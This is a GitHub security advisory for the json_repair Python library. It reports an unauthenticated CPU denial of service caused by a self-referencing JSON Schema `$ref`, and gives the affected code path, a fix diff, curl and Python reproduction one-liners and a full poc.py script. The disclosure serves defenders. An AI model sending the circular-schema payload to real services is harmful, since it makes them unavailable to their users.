"details": "## Circular JSON Schema `$ref` causes unbounded CPU DoS in `json_repair`\n\n### Summary\n\n`SchemaRepairer.resolve_schema()` in `json_repair` follows JSON Schema `$ref` pointers in an unbounded `while` loop without any cycle detection. An attacker who can supply a schema containing a self-referencing `$ref` (e.g., via the demo Flask API or any application that passes untrusted input to `loads(..., schema=...)`), can cause a worker process to spin indefinitely on CPU, resulting in a complete denial of service. No authentication is required against the public demo API. The vulnerability is confirmed reproducible at CVSS 7.5 (High).\n\n### Details\n\n`SchemaRepairer.resolve_schema()` at `src/json_repair/schema_repair.py:184\u2013190` resolves `$ref` chains using a plain `while` loop:\n\n```python\n# src/json_repair/schema_repair.py:184-190\nschema_dict = cast(\"dict[str, Any]\", schema)\nwhile \"$ref\" in schema_dict:\n ref = schema_dict[\"$ref\"]\n resolved = self._resolve_ref(ref)\n if isinstance(resolved, bool):\n return resolved\n schema_dict = resolved\n```\n\n`_resolve_ref()` at `src/json_repair/schema_repair.py:654\u2013665` always resolves references relative to `self.root_schema`, which is initialised from the caller-supplied schema (`src/json_repair/schema_repair.py:130`). When the schema contains a circular reference such as:\n\n```json\n{\"$ref\": \"#/definitions/a\", \"definitions\": {\"a\": {\"$ref\": \"#/definitions/a\"}}}\n```\n\n`_resolve_ref()` returns the same `dict` object on every iteration, so `\"$ref\" in schema_dict` is always `True` and the loop never terminates.\n\nThe vulnerable sink is reachable without authentication through the demo Flask API:\n\n```python\n# docs/app.py:14, 21-36\ndata = request.get_json()\nschema = data.get(\"schema\")\nif schema is not None and not isinstance(schema, (dict, bool)):\n raise ValueError(\"schema must be a JSON object or boolean.\")\n...\nif schema is not None:\n loads_kwargs[\"schema\"] = schema\nparsed_json = loads(malformed_json, **loads_kwargs)\n```\n\nThe only guard is a top-level `isinstance(dict, bool)` check; there is no `$ref` depth limit, no visited-set, and no timeout enforced by the library. The full data-flow path is:\n\n1. `docs/app.py:14` \u2014 `request.get_json()` reads the attacker-controlled HTTP body.\n2. `docs/app.py:21\u201323` \u2014 `schema` is extracted; only `dict`/`bool` type check applied.\n3. `docs/app.py:33\u201336` \u2014 schema is forwarded verbatim to `loads()`.\n4. `src/json_repair/json_repair.py:145\u2013148` \u2014 `schema_from_input(schema)` instantiates `SchemaRepairer`.\n5. `src/json_repair/json_repair.py:160` \u2014 `repairer.is_valid()` calls `resolve_schema()`, triggering the infinite loop.\n6. `src/json_repair/schema_repair.py:184\u2013190` \u2014 unbounded `while \"$ref\" in schema_dict` loop (sink).\n7. `src/json_repair/schema_repair.py:654\u2013665` \u2014 `_resolve_ref()` returns the same object on every call.\n\n**Recommended fix:**\n\n```diff\n--- a/src/json_repair/schema_repair.py\n+++ b/src/json_repair/schema_repair.py\n def resolve_schema(self, schema: object | None) -\u003e dict[str, Any] | bool:\n ...\n- schema_dict = cast(\"dict[str, Any]\", schema)\n+ schema_dict = cast(\"dict[str, Any]\", schema)\n+ seen_schema_ids: set[int] = set()\n while \"$ref\" in schema_dict:\n ref = schema_dict[\"$ref\"]\n+ if not isinstance(ref, str):\n+ raise SchemaDefinitionError(\"$ref must be a string.\")\n+ schema_id = id(schema_dict)\n+ if schema_id in seen_schema_ids:\n+ raise SchemaDefinitionError(f\"Circular $ref detected: {ref}\")\n+ seen_schema_ids.add(schema_id)\n resolved = self._resolve_ref(ref)\n if isinstance(resolved, bool):\n return resolved\n schema_dict = resolved\n return schema_dict\n```\n\n### PoC\n\n**Environment setup:**\n\n```bash\n# Clone the affected version\ngit clone https://github.com/mangiucugna/json_repair.git\ngit -C json_repair checkout 0015c74c01bdafe4bb7435780657501741c2a5f7\n\n# Install dependencies\npip install flask flask-cors jsonschema pydantic\npip install -e json_repair/\n\n# Start the demo API\nPYTHONPATH=json_repair/src flask --app json_repair/docs/app run --host=127.0.0.1 --port=5005\n```\n\n**Alternatively, use the provided Docker image:**\n\n```dockerfile\nFROM python:3.11-slim\nWORKDIR /app\nCOPY repo/ /app/repo/\nRUN pip install --no-cache-dir flask flask-cors jsonschema pydantic \u0026\u0026 \\\n pip install --no-cache-dir -e /app/repo/\nCOPY vuln-001/poc.py /app/poc.py\nCMD [\"python3\", \"/app/poc.py\"]\n```\n\n```bash\ndocker build -t vuln001-json-repair -f vuln-001/Dockerfile .\ndocker run --rm vuln001-json-repair\n```\n\n**HTTP attack request (demo API):**\n\n```bash\ntimeout 5 curl -sS -X POST http://127.0.0.1:5005/api/repair-json \\\n -H \u0027Content-Type: application/json\u0027 \\\n --data \u0027{\"malformedJSON\":\"{}\",\"schema\":{\"$ref\":\"#/definitions/a\",\"definitions\":{\"a\":{\"$ref\":\"#/definitions/a\"}}}}\u0027\n# Expected: no response before timeout; curl exits with code 124\n```\n\n**Direct library attack:**\n\n```bash\ntimeout 5 python3 - \u003c\u003c\u0027PY\u0027\nfrom json_repair import loads\nschema = {\"$ref\": \"#/definitions/a\", \"definitions\": {\"a\": {\"$ref\": \"#/definitions/a\"}}}\nprint(loads(\"{}\", schema=schema))\nPY\n# Expected: process killed after 5 s; exit code 124\n```\n\n**Observed results (from Docker-based dynamic reproduction):**\n\n- Baseline (valid schema `{\"type\":\"object\",\"properties\":{\"name\":{\"type\":\"string\"}}}`): completed in **0.261 s**.\n- Attack (circular `$ref` schema): **timed out after 5.01 s** \u2014 process killed; infinite loop confirmed.\n\n### Impact\n\nThis is an unauthenticated **denial-of-service** vulnerability. Any single HTTP request carrying a circular `$ref` schema hangs the Flask worker process indefinitely, making the service unavailable to all other users until the process is killed or the server is restarted. Because the public demo API (`docs/app.py`) accepts the `schema` field from the request body without authentication and passes it directly to `loads()`, remote attackers can exploit this with a trivial one-liner.\n\nBeyond the demo API, any application that exposes `json_repair.loads(..., schema=\u003cuser-controlled\u003e)` to untrusted callers is equally affected. The vulnerability requires no special privileges, produces no useful output for the attacker (confidentiality and integrity are unaffected), and is deterministically reproducible.\n\n### Reproduction artifacts\n\n#### `Dockerfile`\n\n```dockerfile\nFROM python:3.11-slim\n\nWORKDIR /app\n\n# Copy the vulnerable json_repair repository (build context is the report root)\nCOPY repo/ /app/repo/\n\n# Install Flask demo API dependencies and schema extras\nRUN pip install --no-cache-dir \\\n flask \\\n flask-cors \\\n jsonschema \\\n pydantic \u0026\u0026 \\\n pip install --no-cache-dir -e /app/repo/\n\n# Copy the proof-of-concept script\nCOPY vuln-001/poc.py /app/poc.py\n\nCMD [\"python3\", \"/app/poc.py\"]\n```\n\n#### `poc.py`\n\n```python\n#!/usr/bin/env python3\n\"\"\"\nPoC for VULN-001: Circular JSON Schema $ref causes unbounded CPU DoS\nCWE-835 \u2014 Loop with Unreachable Exit Condition\n\nAffected: json_repair \u003c= 0.59.10 (commit 0015c74)\nSink: src/json_repair/schema_repair.py:185\n SchemaRepairer.resolve_schema() while loop follows $ref without cycle detection.\n\nAttack schema:\n {\"$ref\": \"#/definitions/a\", \"definitions\": {\"a\": {\"$ref\": \"#/definitions/a\"}}}\n\nWhen passed to loads(..., schema=\u003cabove\u003e), resolve_schema() enters an infinite loop\nbecause _resolve_ref() always returns the same dict object from root_schema.\n\nVerdict logic:\n - Baseline (valid schema) must complete in \u003c TIMEOUT seconds.\n - Attack (circular $ref) must still be running at TIMEOUT seconds.\n Both conditions together constitute deterministic proof of the vulnerability.\n\"\"\"\n\nimport os\nimport subprocess\nimport sys\nimport tempfile\nimport time\n\n# Seconds to wait before declaring the attack confirmed (infinite loop)\nTIMEOUT_SECONDS = 5\n\nCIRCULAR_SCHEMA = {\n \"$ref\": \"#/definitions/a\",\n \"definitions\": {\n \"a\": {\"$ref\": \"#/definitions/a\"}\n }\n}\n\nNORMAL_SCHEMA = {\n \"type\": \"object\",\n \"properties\": {\n \"name\": {\"type\": \"string\"}\n }\n}\n\n_RUNNER_TEMPLATE = \"\"\"\\\nimport sys\nsys.path.insert(0, \u0027/app/repo/src\u0027)\nfrom json_repair import loads\nschema = {schema_repr}\nresult = loads(\u0027{{}}\u0027, schema=schema)\nprint(result)\n\"\"\"\n\n\ndef run_schema_test(schema: dict, timeout: int) -\u003e tuple[bool, float, str]:\n \"\"\"\n Run json_repair loads() with the given schema in an isolated subprocess.\n\n Returns:\n timed_out (bool): True if the process was still running at `timeout` seconds.\n elapsed (float): Wall-clock seconds until completion or kill.\n output (str): stdout/stderr excerpt.\n \"\"\"\n script_content = _RUNNER_TEMPLATE.format(schema_repr=repr(schema))\n\n with tempfile.NamedTemporaryFile(mode=\"w\", suffix=\".py\", delete=False) as fh:\n fh.write(script_content)\n script_path = fh.name\n\n start = time.monotonic()\n try:\n proc = subprocess.run(\n [sys.executable, script_path],\n timeout=timeout,\n capture_output=True,\n text=True,\n )\n elapsed = time.monotonic() - start\n output = (proc.stdout.strip() or proc.stderr.strip())[:400]\n return False, elapsed, output\n except subprocess.TimeoutExpired:\n elapsed = time.monotonic() - start\n return True, elapsed, f\"[no output \u2014 process killed after {elapsed:.2f}s]\"\n finally:\n os.unlink(script_path)\n\n\ndef main() -\u003e int:\n print(\"=\" * 64)\n print(\"VULN-001 PoC: Circular $ref JSON Schema DoS\")\n print(\"json_repair SchemaRepairer.resolve_schema() \u2014 CWE-835\")\n print(\"=\" * 64)\n\n # --- Test 1: baseline (must complete quickly) ---\n print(f\"\\n[TEST 1] Baseline \u2014 valid schema (expect completion \u003c {TIMEOUT_SECONDS}s)\")\n timed_out_baseline, elapsed_baseline, output_baseline = run_schema_test(\n NORMAL_SCHEMA, TIMEOUT_SECONDS\n )\n if timed_out_baseline:\n print(f\" UNEXPECTED TIMEOUT after {elapsed_baseline:.2f}s \u2014 environment issue\")\n baseline_ok = False\n else:\n print(f\" COMPLETED in {elapsed_baseline:.3f}s -\u003e {output_baseline}\")\n baseline_ok = True\n\n # --- Test 2: circular $ref attack (must time out) ---\n print(\n f\"\\n[TEST 2] Attack \u2014 circular $ref schema\"\n f\" (expect hang \u003e {TIMEOUT_SECONDS}s)\"\n )\n print(f\" Schema: {CIRCULAR_SCHEMA}\")\n timed_out_attack, elapsed_attack, output_attack = run_schema_test(\n CIRCULAR_SCHEMA, TIMEOUT_SECONDS\n )\n if timed_out_attack:\n print(\n f\" TIMED OUT after {elapsed_attack:.2f}s \"\n f\"\u2014 infinite loop CONFIRMED (VULNERABLE)\"\n )\n attack_confirmed = True\n else:\n print(\n f\" Completed in {elapsed_attack:.3f}s -\u003e {output_attack}\"\n f\"\\n (patched or not triggered \u2014 check installation)\"\n )\n attack_confirmed = False\n\n # --- Summary ---\n print(\"\\n\" + \"=\" * 64)\n if baseline_ok and attack_confirmed:\n print(\"VERDICT: PASS\")\n print(\" Normal schema : returned in under 1 s\")\n print(f\" Circular $ref : still running after {TIMEOUT_SECONDS}s (killed)\")\n print(\" Conclusion: resolve_schema() enters an unbounded loop on circular $ref.\")\n return 0\n elif not attack_confirmed:\n print(\"VERDICT: FAIL \u2014 circular $ref did not cause an infinite loop\")\n print(\" The library may already be patched in this build.\")\n return 2\n else:\n print(\"VERDICT: FAIL \u2014 baseline test failed; check the environment\")\n return 3\n\n\nif __name__ == \"__main__\":\n sys.exit(main())\n```",
"id": "GHSA-xf7x-x43h-rpqh",
"modified": "2026-07-13T23:41:39Z",
"published": "2026-07-13T23:41:39Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/mangiucugna/json_repair/security/advisories/GHSA-xf7x-x43h-rpqh"
},
{
"type": "PACKAGE",
"url": "https://github.com/mangiucugna/json_repair"
},
{
"type": "WEB",
"url": "https://github.com/mangiucugna/json_repair/releases/tag/v0.60.1"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
}
],
"summary": "json_repair: Circular JSON Schema `$ref` causes unbounded CPU DoS"
}
No mitigation information available for this CWE.
No CAPEC attack patterns related to this CWE.